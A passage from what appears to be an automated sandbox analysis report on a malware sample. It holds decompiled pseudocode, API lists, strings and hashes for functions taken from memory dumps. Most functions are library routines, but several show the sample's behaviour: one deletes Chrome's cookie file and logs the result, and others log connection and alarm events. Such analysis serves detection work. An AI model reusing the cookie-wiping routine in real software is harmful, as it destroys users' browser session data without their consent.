					E105D1063( *((intOrPtr*)(_t45 + 0xa4)));
					E105D1063( *((intOrPtr*)(_t45 + 0xa8)));
					E105D9D2F(_t45 + 0xb4, 7);
					E105D9D2F(_t45 + 0xd0, 7);
					E105D9D2F(_t45 + 0xec, 0xc);
					E105D9D2F(_t45 + 0x11c, 0xc);
					E105D9D2F(_t45 + 0x14c, 2);
					E105D1063( *((intOrPtr*)(_t45 + 0x154)));
					E105D1063( *((intOrPtr*)(_t45 + 0x158)));
					E105D1063( *((intOrPtr*)(_t45 + 0x15c)));
					return E105D1063( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x105d9fee
0x105d9ff3
0x105d9ffc
0x105da007
0x105da012
0x105da01d
0x105da02b
0x105da036
0x105da041
0x105da04c
0x105da05a
0x105da068
0x105da079
0x105da087
0x105da095
0x105da0a0
0x105da0ab
0x105da0b6
0x00000000
0x105da0c6
0x105da0cb

APIs

Part of subcall function 105D9D2F: _free.LIBCMT ref: 105D9D58

_free.LIBCMT ref: 105DA036

Part of subcall function 105D1063: HeapFree.KERNEL32(00000000,00000000,?,105D9D5D,?,00000000,?,00000000,?,105DA001,?,00000007,?,?,105DA54C,?), ref: 105D1079
Part of subcall function 105D1063: GetLastError.KERNEL32(?,?,105D9D5D,?,00000000,?,00000000,?,105DA001,?,00000007,?,?,105DA54C,?,?), ref: 105D108B

_free.LIBCMT ref: 105DA041
_free.LIBCMT ref: 105DA04C
_free.LIBCMT ref: 105DA0A0
_free.LIBCMT ref: 105DA0AB
_free.LIBCMT ref: 105DA0B6
_free.LIBCMT ref: 105DA0C1

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5569464c6c268c2a743bdaa509ba4960f6d5677ae10f9c6a881df30bb007768e
Instruction ID: 27460e2693a3df4c2be1fc024b6c022e7dcbcad82717d958d80944cdc1236c6e
Opcode Fuzzy Hash: 5569464c6c268c2a743bdaa509ba4960f6d5677ae10f9c6a881df30bb007768e
Instruction Fuzzy Hash: 9411EA75640B48FBD520B7B9CC4EFCBBBAEDF84740F404C16B299AA250DA65B5444790

Uniqueness

Uniqueness Score: -1.00%

Function 0044917A, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0044917A(intOrPtr _a4) {
				void* _t18;
				intOrPtr _t45;

				_t45 = _a4;
				if(_t45 != 0) {
					E00448EC1(_t45, 7);
					_t2 = _t45 + 0x1c; // 0x1c
					E00448EC1(_t2, 7);
					_t3 = _t45 + 0x38; // 0x38
					E00448EC1(_t3, 0xc);
					_t4 = _t45 + 0x68; // 0x68
					E00448EC1(_t4, 0xc);
					_t5 = _t45 + 0x98; // 0x98
					E00448EC1(_t5, 2);
					E004401F5( *((intOrPtr*)(_t45 + 0xa0)));
					E004401F5( *((intOrPtr*)(_t45 + 0xa4)));
					E004401F5( *((intOrPtr*)(_t45 + 0xa8)));
					_t9 = _t45 + 0xb4; // 0xb4
					E00448EC1(_t9, 7);
					_t10 = _t45 + 0xd0; // 0xd0
					E00448EC1(_t10, 7);
					_t11 = _t45 + 0xec; // 0xec
					E00448EC1(_t11, 0xc);
					_t12 = _t45 + 0x11c; // 0x11c
					E00448EC1(_t12, 0xc);
					_t13 = _t45 + 0x14c; // 0x14c
					E00448EC1(_t13, 2);
					E004401F5( *((intOrPtr*)(_t45 + 0x154)));
					E004401F5( *((intOrPtr*)(_t45 + 0x158)));
					E004401F5( *((intOrPtr*)(_t45 + 0x15c)));
					return E004401F5( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x00449180
0x00449185
0x0044918e
0x00449193
0x00449199
0x0044919e
0x004491a4
0x004491a9
0x004491af
0x004491b4
0x004491bd
0x004491c8
0x004491d3
0x004491de
0x004491e3
0x004491ec
0x004491f1
0x004491fa
0x00449202
0x0044920b
0x00449210
0x00449219
0x0044921e
0x00449227
0x00449232
0x0044923d
0x00449248
0x00000000
0x00449258
0x0044925d

APIs

Part of subcall function 00448EC1: _free.LIBCMT ref: 00448EEA

_free.LIBCMT ref: 004491C8

Part of subcall function 004401F5: HeapFree.KERNEL32(00000000,00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000), ref: 0044020B
Part of subcall function 004401F5: GetLastError.KERNEL32(00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000,00000000), ref: 0044021D

_free.LIBCMT ref: 004491D3
_free.LIBCMT ref: 004491DE
_free.LIBCMT ref: 00449232
_free.LIBCMT ref: 0044923D
_free.LIBCMT ref: 00449248
_free.LIBCMT ref: 00449253

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5569464c6c268c2a743bdaa509ba4960f6d5677ae10f9c6a881df30bb007768e
Instruction ID: d0ac5bec4300d42e5daa1f0178d5914e2472619a840d7a0986f756f09d30ade7
Opcode Fuzzy Hash: 5569464c6c268c2a743bdaa509ba4960f6d5677ae10f9c6a881df30bb007768e
Instruction Fuzzy Hash: A7115172940B04BAFA20BBB2CC47FCF779CAF00705F50081EB39AA6052DE7EB5244658

Uniqueness

Uniqueness Score: -1.00%

Function 004350B5, Relevance: 10.6, APIs: 7, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E004350B5(void* __ecx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t25;
				void* _t28;

				if( *0x46a090 != 0xffffffff) {
					_t25 = GetLastError();
					_t11 = E00431BD8(__eflags,  *0x46a090);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E00431C12(__eflags,  *0x46a090, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_t28 = E0043F348(_t16, 1, 0x28);
								__eflags = _t28;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E00431C12(__eflags,  *0x46a090, 0);
								} else {
									__eflags = E00431C12(__eflags,  *0x46a090, _t28);
									if(__eflags != 0) {
										_t11 = _t28;
										_t28 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E004401F5(_t28);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t25);
					return _t11;
				} else {
					return 0;
				}
			}

0x004350bc
0x004350cf
0x004350d6
0x004350d9
0x004350dc
0x004350f5
0x004350f5
0x004350de
0x004350de
0x004350e0
0x004350ea
0x004350f0
0x004350f1
0x004350f3
0x00435103
0x00435107
0x00435109
0x0043511d
0x0043511d
0x00435126
0x0043510b
0x00435119
0x0043511b
0x0043512f
0x00435131
0x00435131
0x00000000
0x00000000
0x00000000
0x0043511b
0x00435134
0x00000000
0x00000000
0x00000000
0x004350f3
0x004350e0
0x0043513c
0x00435146
0x004350be
0x004350c0
0x004350c0

APIs

GetLastError.KERNEL32(?,?,004350AC,004321F2), ref: 004350C3
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004350D1
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004350EA
SetLastError.KERNEL32(00000000,?,004350AC,004321F2), ref: 0043513C

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 3f66e197c8296636e8c0cb4b5eca29cb01eb5dab6965f0ce3b8c02db1c8883f5
Instruction ID: a515c6194843fa53ce6413da374b9e5764b9e55810f12d35b037beed10178e82
Opcode Fuzzy Hash: 3f66e197c8296636e8c0cb4b5eca29cb01eb5dab6965f0ce3b8c02db1c8883f5
Instruction Fuzzy Hash: EC01F532549B115EEA152E79AC4562B2654DB0D779F20223FF220511F1FE594C11564E

Uniqueness

Uniqueness Score: -1.00%

Function 00409F83, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00409F83(void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				void* __ebx;
				void* __ebp;
				long _t18;
				void* _t20;
				void* _t21;
				void* _t28;
				void* _t31;
				void* _t32;

				_t35 = __eflags;
				_t31 = __edi;
				_t30 = E00402084(_t20,  &_v52, E0043988A(_t20, __eflags, "UserProfile"));
				E00405343(_t20,  &_v28, _t7, _t31, _t35, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies");
				E00401FC7();
				if(DeleteFileA(E00401F95( &_v28)) != 0) {
					_t28 = _t32 - 0x18;
					_push("\n[Chrome Cookies found, cleared!]");
					goto L6;
				} else {
					_t18 = GetLastError();
					if(_t18 == 0 || _t18 == 1) {
						_t28 = _t32 - 0x18;
						_push("\n[Chrome Cookies not found]");
						L6:
						E00402084(_t20, _t28);
						E0040A6EF(_t20, _t30, __eflags);
						_t21 = 1;
					} else {
						_t21 = 0;
					}
				}
				E00401FC7();
				return _t21;
			}

0x00409f83
0x00409f83
0x00409fa3
0x00409fa8
0x00409fb1
0x00409fc7
0x00409fed
0x00409fef
0x00000000
0x00409fc9
0x00409fd0
0x00409fd3
0x00409fe1
0x00409fe3
0x00409ff4
0x00409ff4
0x00409ff9
0x00409ffe
0x00409fda
0x00409fda
0x00409fda
0x00409fd3
0x0040a006
0x0040a011

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 00409FBF
GetLastError.KERNEL32 ref: 00409FC9

Strings

[Chrome Cookies not found], xrefs: 00409FE3
UserProfile, xrefs: 00409F8F
\AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 00409F8A
[Chrome Cookies found, cleared!], xrefs: 00409FEF

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
API String ID: 2018770650-304995407
Opcode ID: 406161bcccb04ea4bd035d61b719718c660ea5330f87ff24f7238f47a886d868
Instruction ID: a05454d7c9f7ea62d42fa80a0568230d8b7d5f3f2d87ad081c1d7252bc9e5d76
Opcode Fuzzy Hash: 406161bcccb04ea4bd035d61b719718c660ea5330f87ff24f7238f47a886d868
Instruction Fuzzy Hash: 8501F72164020B57CA09BA75CD5B8BF7724A911309B50017FFC02B61E3FD394D09C5CB

Uniqueness

Uniqueness Score: -1.00%

Function 0040511B, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040511B(void* __ecx, void* __edi, char _a4) {
				void* _t17;
				void* _t22;
				void* _t23;

				_t22 = __ecx;
				if( *((char*)(__ecx + 0x50)) == 0) {
					return 0;
				}
				if(_a4 == 0) {
					_t24 = _t23 - 0x18;
					E00402084(_t17, _t23 - 0x18, "Connection KeepAlive disabled");
					E00402084(_t17, _t24 - 0x18, "[WARNING]");
					E00416C80(_t17, __edi);
				}
				 *(_t22 + 0x58) = CreateEventA(0, 0, 0, 0);
				SetEvent( *(_t22 + 0x54));
				WaitForSingleObject( *(_t22 + 0x58), 0xffffffff);
				CloseHandle( *(_t22 + 0x58));
				return 1;
			}

0x0040511f
0x00405125
0x00000000
0x00405183
0x0040512b
0x0040512d
0x00405137
0x00405146
0x0040514b
0x00405150
0x00405162
0x00405165
0x00405170
0x00405179
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,0046C2E8,?,00404CA9,00000001,0046C2E8,00404C56,00000000,00000000,00000000), ref: 00405159
SetEvent.KERNEL32(?,?,00404CA9,00000001,0046C2E8,00404C56,00000000,00000000,00000000), ref: 00405165
WaitForSingleObject.KERNEL32(?,000000FF,?,00404CA9,00000001,0046C2E8,00404C56,00000000,00000000,00000000), ref: 00405170
CloseHandle.KERNEL32(?,?,00404CA9,00000001,0046C2E8,00404C56,00000000,00000000,00000000), ref: 00405179

Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A

Strings

Connection KeepAlive disabled, xrefs: 00405132
[WARNING], xrefs: 00405141

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
String ID: Connection KeepAlive disabled$[WARNING]
API String ID: 2993684571-804309475
Opcode ID: 6700614dca504244a55bd319c10cf8dd84f4c90e38274ba8f930ec3cb829daee
Instruction ID: 60a08de37f047c10c4ebd60d286cc91250b6658f2aab9bb1a866a2a778ec74b8
Opcode Fuzzy Hash: 6700614dca504244a55bd319c10cf8dd84f4c90e38274ba8f930ec3cb829daee
Instruction Fuzzy Hash: E0F0C272900B407FDB103BB59C0EA7B7B98DB0135AF04057AFD41926E2DAB9D8548B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00416737, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30
sleepCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00416737(WCHAR* __ecx) {
				void* __edi;
				void* _t7;
				void* _t11;
				WCHAR* _t13;
				void* _t15;

				_t16 = _t15 - 0x18;
				_t13 = __ecx;
				E00402084(_t7, _t15 - 0x18, "Alarm has been triggered!");
				E00402084(_t7, _t16 - 0x18, "[ALARM]");
				E00416C80(_t7, _t11);
				PlaySoundW(_t13, GetModuleHandleA(0), 0x20009);
				Sleep(0x2710);
				return PlaySoundW(0, 0, 0);
			}

0x00416739
0x0041673c
0x00416745
0x00416754
0x00416759
0x00416777
0x0041677e
0x0041678b

APIs

Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A

GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00416769
PlaySoundW.WINMM(00000000,00000000), ref: 00416777
Sleep.KERNEL32(00002710), ref: 0041677E
PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00416787

Strings

Alarm has been triggered!, xrefs: 00416740
[ALARM], xrefs: 0041674F

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: PlaySound$HandleLocalModuleSleepTime
String ID: Alarm has been triggered!$[ALARM]
API String ID: 614609389-1190268461
Opcode ID: a72f7bbe0ff649907879a8ec4559d77060f8c7e034846c054ca5bf069f778dcf
Instruction ID: 3dbfa3bc3acc833274b6e0f43357c326849184f6c95de14e1e3858e62b15b156
Opcode Fuzzy Hash: a72f7bbe0ff649907879a8ec4559d77060f8c7e034846c054ca5bf069f778dcf
Instruction Fuzzy Hash: D9E09222A00221379514376A6D0FD6F3D28CAC2B62B01016FFE08661829D944810C6FB

Uniqueness

Uniqueness Score: -1.00%

Function 105C6607, Relevance: 9.3, APIs: 6, Instructions: 284
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E105C6607(void* __ebx, signed int __edx, void* __edi, void* _a4, signed int _a8) {
				intOrPtr _v0;
				char _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				char _v24;
				void* __esi;
				void* __ebp;
				signed int _t61;
				void* _t64;
				signed int _t67;
				signed int _t69;
				signed int _t70;
				signed int _t73;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				intOrPtr _t80;
				signed int _t81;
				void* _t82;
				signed int _t84;
				void* _t85;
				signed int _t87;
				signed int _t93;
				signed int _t102;
				void* _t104;
				signed int _t107;
				signed int* _t110;
				signed int* _t111;
				intOrPtr* _t113;
				signed int _t118;
				signed int _t120;
				signed int _t123;
				void* _t125;
				signed int _t128;
				signed int _t131;
				signed int _t139;
				signed int _t145;
				void _t147;
				void* _t148;
				void* _t150;
				void* _t152;
				signed int _t153;
				signed int _t154;
				void* _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				intOrPtr _t159;

				_t139 = __edx;
				_t155 = _a4;
				if(_t155 == 0) {
					_t113 = E105CB372();
					_t159 = 0x16;
					 *_t113 = _t159;
					E105C77CB();
					return _t159;
				}
				_push(__edi);
				_t123 = 9;
				memset(_t155, _t61 | 0xffffffff, _t123 << 2);
				_t145 = _a8;
				__eflags = _t145;
				if(_t145 == 0) {
					_t111 = E105CB372();
					_t158 = 0x16;
					 *_t111 = _t158;
					E105C77CB();
					_t78 = _t158;
					L12:
					return _t78;
				}
				_push(__ebx);
				__eflags =  *(_t145 + 4);
				if(__eflags <= 0) {
					if(__eflags < 0) {
						L10:
						_t110 = E105CB372();
						_t157 = 0x16;
						 *_t110 = _t157;
						_t78 = _t157;
						L11:
						goto L12;
					}
					__eflags =  *_t145;
					if( *_t145 < 0) {
						goto L10;
					}
				}
				_t64 = 7;
				__eflags =  *(_t145 + 4) - _t64;
				if(__eflags >= 0) {
					if(__eflags > 0) {
						goto L10;
					}
					__eflags =  *_t145 - 0x93406fff;
					if(__eflags > 0) {
						goto L10;
					}
				}
				E105D3F0C(0, _t145, _t155, __eflags);
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				_t67 = E105D3741( &_v12);
				_pop(_t125);
				__eflags = _t67;
				if(_t67 == 0) {
					_t75 = E105D376D( &_v16);
					_pop(_t125);
					__eflags = _t75;
					if(_t75 == 0) {
						_t77 = E105D3799( &_v8);
						_pop(_t125);
						__eflags = _t77;
						if(_t77 == 0) {
							_t118 =  *(_t145 + 4);
							_t128 =  *_t145;
							__eflags = _t118;
							if(__eflags < 0) {
								L28:
								_push(_t145);
								_push(_t155);
								_t78 = E105CD545();
								__eflags = _t78;
								if(_t78 != 0) {
									goto L11;
								}
								__eflags = _v12;
								asm("cdq");
								_t147 =  *_t155;
								_t120 = _t139;
								if(__eflags == 0) {
									L32:
									_t80 = _v8;
									L33:
									asm("cdq");
									_t148 = _t147 - _t80;
									asm("sbb ebx, edx");
									_t81 = E105E1ADE(_t148, _t120, 0x3c, 0);
									 *_t155 = _t81;
									__eflags = _t81;
									if(_t81 < 0) {
										_t148 = _t148 + 0xffffffc4;
										 *_t155 = _t81 + 0x3c;
										asm("adc ebx, 0xffffffff");
									}
									_t82 = E105E1A2E(_t148, _t120, 0x3c, 0);
									_t121 = _t139;
									_t28 = _t155 + 4; // 0x848d0045
									asm("cdq");
									_t150 = _t82 +  *_t28;
									asm("adc ebx, edx");
									_t84 = E105E1ADE(_t150, _t139, 0x3c, 0);
									 *(_t155 + 4) = _t84;
									__eflags = _t84;
									if(_t84 < 0) {
										_t150 = _t150 + 0xffffffc4;
										 *(_t155 + 4) = _t84 + 0x3c;
										asm("adc ebx, 0xffffffff");
									}
									_t85 = E105E1A2E(_t150, _t121, 0x3c, 0);
									_t122 = _t139;
									_t31 = _t155 + 8; // 0xa824
									asm("cdq");
									_t152 = _t85 +  *_t31;
									asm("adc ebx, edx");
									_t87 = E105E1ADE(_t152, _t139, 0x18, 0);
									 *(_t155 + 8) = _t87;
									__eflags = _t87;
									if(_t87 < 0) {
										_t152 = _t152 + 0xffffffe8;
										 *(_t155 + 8) = _t87 + 0x18;
										asm("adc ebx, 0xffffffff");
									}
									_t131 = E105E1A2E(_t152, _t122, 0x18, 0);
									__eflags = _t139;
									if(__eflags < 0) {
										L48:
										_t44 = _t155 + 0x18; // 0xa024848d
										 *(_t155 + 0xc) =  *(_t155 + 0xc) + _t131;
										asm("cdq");
										_t153 = 7;
										_t51 = _t155 + 0xc; // 0x50506a00
										_t93 =  *_t51;
										 *(_t155 + 0x18) = ( *_t44 + 7 + _t131) % _t153;
										__eflags = _t93;
										if(_t93 > 0) {
											goto L43;
										}
										 *((intOrPtr*)(_t155 + 0x10)) = 0xb;
										 *(_t155 + 0xc) = _t93 + 0x1f;
										_t55 = _t131 + 0x16d; // 0x16d
										 *(_t155 + 0x1c) =  *(_t155 + 0x1c) + _t55;
										 *((intOrPtr*)(_t155 + 0x14)) =  *((intOrPtr*)(_t155 + 0x14)) - 1;
										goto L44;
									} else {
										if(__eflags > 0) {
											L42:
											_t34 = _t155 + 0x18; // 0xa024848d
											asm("cdq");
											_t154 = 7;
											_t39 = _t155 + 0xc;
											 *_t39 =  *(_t155 + 0xc) + _t131;
											__eflags =  *_t39;
											 *(_t155 + 0x18) = ( *_t34 + _t131) % _t154;
											L43:
											_t42 = _t155 + 0x1c;
											 *_t42 =  *(_t155 + 0x1c) + _t131;
											__eflags =  *_t42;
											L44:
											_t78 = 0;
											goto L11;
										}
										__eflags = _t131;
										if(_t131 == 0) {
											__eflags = _t139;
											if(__eflags > 0) {
												goto L44;
											}
											if(__eflags < 0) {
												goto L48;
											}
											__eflags = _t131;
											if(_t131 >= 0) {
												goto L44;
											}
											goto L48;
										}
										goto L42;
									}
								}
								_push(_t155);
								_t102 = E105D3F5D(_t120, _t147, _t155, __eflags);
								__eflags = _t102;
								if(_t102 == 0) {
									goto L32;
								}
								_t80 = _v8 + _v16;
								 *((intOrPtr*)(_t155 + 0x20)) = 1;
								goto L33;
							}
							if(__eflags > 0) {
								L20:
								_t104 = 7;
								__eflags = _t118 - _t104;
								if(__eflags > 0) {
									goto L28;
								}
								if(__eflags < 0) {
									L23:
									asm("cdq");
									_push( &_v24);
									asm("sbb ebx, edx");
									_v24 = _t128 - _v8;
									_push(_t155);
									_v20 = _t118;
									_t78 = E105CD545();
									__eflags = _t78;
									if(_t78 != 0) {
										goto L11;
									}
									__eflags = _v12 - _t78;
									if(__eflags == 0) {
										goto L44;
									}
									_push(_t155);
									_t107 = E105D3F5D(_t118, _t145, _t155, __eflags);
									__eflags = _t107;
									if(_t107 == 0) {
										goto L44;
									}
									asm("cdq");
									_v24 = _v24 - _v16;
									_push( &_v24);
									asm("sbb [ebp-0x10], edx");
									_push(_t155);
									_t78 = E105CD545();
									__eflags = _t78;
									if(_t78 != 0) {
										goto L11;
									}
									 *((intOrPtr*)(_t155 + 0x20)) = 1;
									goto L44;
								}
								__eflags = _t128 - 0x933c7b7f;
								if(_t128 >= 0x933c7b7f) {
									goto L28;
								}
								goto L23;
							}
							__eflags = _t128 - 0x3f480;
							if(_t128 <= 0x3f480) {
								goto L28;
							}
							goto L20;
						}
					}
				}
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				E105C77F8();
				asm("int3");
				_push(_t155);
				_t69 = E105CD4E0(_t125);
				_t156 = _t69;
				__eflags = _t156;
				if(_t156 != 0) {
					_push(_v0);
					_t70 = E105C6607(0, _t139, _t145, _t156);
					asm("sbb eax, eax");
					_t73 =  !( ~_t70) & _t156;
					__eflags = _t73;
					return _t73;
				}
				return _t69;
			}

0x105c6607
0x105c6610
0x105c6615
0x105c6617
0x105c661e
0x105c661f
0x105c6621
0x00000000
0x105c6626
0x105c662a
0x105c6632
0x105c6633
0x105c6635
0x105c6638
0x105c663a
0x105c663c
0x105c6643
0x105c6644
0x105c6646
0x105c664b
0x105c667c
0x00000000
0x105c667c
0x105c664f
0x105c6652
0x105c6655
0x105c6657
0x105c666f
0x105c666f
0x105c6676
0x105c6677
0x105c6679
0x105c667b
0x00000000
0x105c667b
0x105c6659
0x105c665b
0x00000000
0x00000000
0x105c665b
0x105c665f
0x105c6660
0x105c6663
0x105c6665
0x00000000
0x00000000
0x105c6667
0x105c666d
0x00000000
0x00000000
0x105c666d
0x105c6682
0x105c668a
0x105c668e
0x105c6691
0x105c6694
0x105c6699
0x105c669a
0x105c669c
0x105c66a6
0x105c66ab
0x105c66ac
0x105c66ae
0x105c66b8
0x105c66bd
0x105c66be
0x105c66c0
0x105c66c6
0x105c66c9
0x105c66cb
0x105c66cd
0x105c674e
0x105c674e
0x105c674f
0x105c6750
0x105c6757
0x105c6759
0x00000000
0x00000000
0x105c675f
0x105c6765
0x105c6766
0x105c6768
0x105c676a
0x105c6786
0x105c6786
0x105c6789
0x105c6789
0x105c678a
0x105c6790
0x105c6794
0x105c6799
0x105c679b
0x105c679d
0x105c67a2
0x105c67a5
0x105c67a7
0x105c67a7
0x105c67b0
0x105c67b7
0x105c67b9
0x105c67bc
0x105c67bd
0x105c67c3
0x105c67c7
0x105c67cc
0x105c67cf
0x105c67d1
0x105c67d6
0x105c67d9
0x105c67dc
0x105c67dc
0x105c67e5
0x105c67ec
0x105c67ee
0x105c67f1
0x105c67f2
0x105c67f8
0x105c67fc
0x105c6801
0x105c6804
0x105c6806
0x105c680b
0x105c680e
0x105c6811
0x105c6811
0x105c681f
0x105c6821
0x105c6823
0x105c6850
0x105c6850
0x105c6856
0x105c685d
0x105c685e
0x105c6861
0x105c6861
0x105c6864
0x105c6867
0x105c6869
0x00000000
0x00000000
0x105c686e
0x105c6875
0x105c6878
0x105c687e
0x105c6881
0x00000000
0x105c6825
0x105c6825
0x105c682b
0x105c682b
0x105c6832
0x105c6833
0x105c6836
0x105c6836
0x105c6836
0x105c6839
0x105c683c
0x105c683c
0x105c683c
0x105c683c
0x105c683f
0x105c683f
0x00000000
0x105c683f
0x105c6827
0x105c6829
0x105c6846
0x105c6848
0x00000000
0x00000000
0x105c684a
0x00000000
0x00000000
0x105c684c
0x105c684e
0x00000000
0x00000000
0x00000000
0x105c684e
0x00000000
0x105c6829
0x105c6823
0x105c676c
0x105c676d
0x105c6773
0x105c6775
0x00000000
0x00000000
0x105c677a
0x105c677d
0x00000000
0x105c677d
0x105c66cf
0x105c66d9
0x105c66db
0x105c66dc
0x105c66de
0x00000000
0x00000000
0x105c66e0
0x105c66ea
0x105c66ed
0x105c66f3
0x105c66f4
0x105c66f6
0x105c66f9
0x105c66fa
0x105c66fd
0x105c6704
0x105c6706
0x00000000
0x00000000
0x105c670c
0x105c670f
0x00000000
0x00000000
0x105c6715
0x105c6716
0x105c671c
0x105c671e
0x00000000
0x00000000
0x105c6727
0x105c6728
0x105c672e
0x105c672f
0x105c6732
0x105c6733
0x105c673a
0x105c673c
0x00000000
0x00000000
0x105c6742
0x00000000
0x105c6742
0x105c66e2
0x105c66e8
0x00000000
0x00000000
0x00000000
0x105c66e8
0x105c66d1
0x105c66d7
0x00000000
0x00000000
0x00000000
0x105c66d7
0x105c66c0
0x105c66ae
0x105c6886
0x105c6887
0x105c6888
0x105c6889
0x105c688a
0x105c688b
0x105c6890
0x105c6896
0x105c6897
0x105c689c
0x105c689e
0x105c68a0
0x105c68a2
0x105c68a6
0x105c68ae
0x105c68b3
0x105c68b3
0x00000000
0x105c68b3
0x105c68b7

APIs

__allrem.LIBCMT ref: 105C6794
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 105C67B0
__allrem.LIBCMT ref: 105C67C7
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 105C67E5
__allrem.LIBCMT ref: 105C67FC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 105C681A

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 72cb9584bf9c46cebf665fcacbcb8dac0ae959ede31be18aeb0c43964b5390ae
Instruction ID: f86f8c2f23a03435d2efe623d088869510887b1d46028a80942f50565eaedac9
Opcode Fuzzy Hash: 72cb9584bf9c46cebf665fcacbcb8dac0ae959ede31be18aeb0c43964b5390ae
Instruction Fuzzy Hash: 1C810976A007069BE7109EB9CE45B5A7BFDEF88764F11453AF411D7280E770FA418BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00435799, Relevance: 9.3, APIs: 6, Instructions: 284COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00435926
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00435942
__allrem.LIBCMT ref: 00435959
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00435977
__allrem.LIBCMT ref: 0043598E
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004359AC

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 258e57513f608f90b5a19f46d233bda83a55d4bc811eeb716edfff4965c679b3
Instruction ID: 35372c1425533dcebe3bda436374fdb164c2facb18fb88ba24de970f82e87be5
Opcode Fuzzy Hash: 258e57513f608f90b5a19f46d233bda83a55d4bc811eeb716edfff4965c679b3
Instruction Fuzzy Hash: 4D810972600F06ABE724AE69CC42B6B73E8AF49778F24552FF411D7681E77CD9008798

Uniqueness

Uniqueness Score: -1.00%

Function 105D545D, Relevance: 9.2, APIs: 6, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 69%

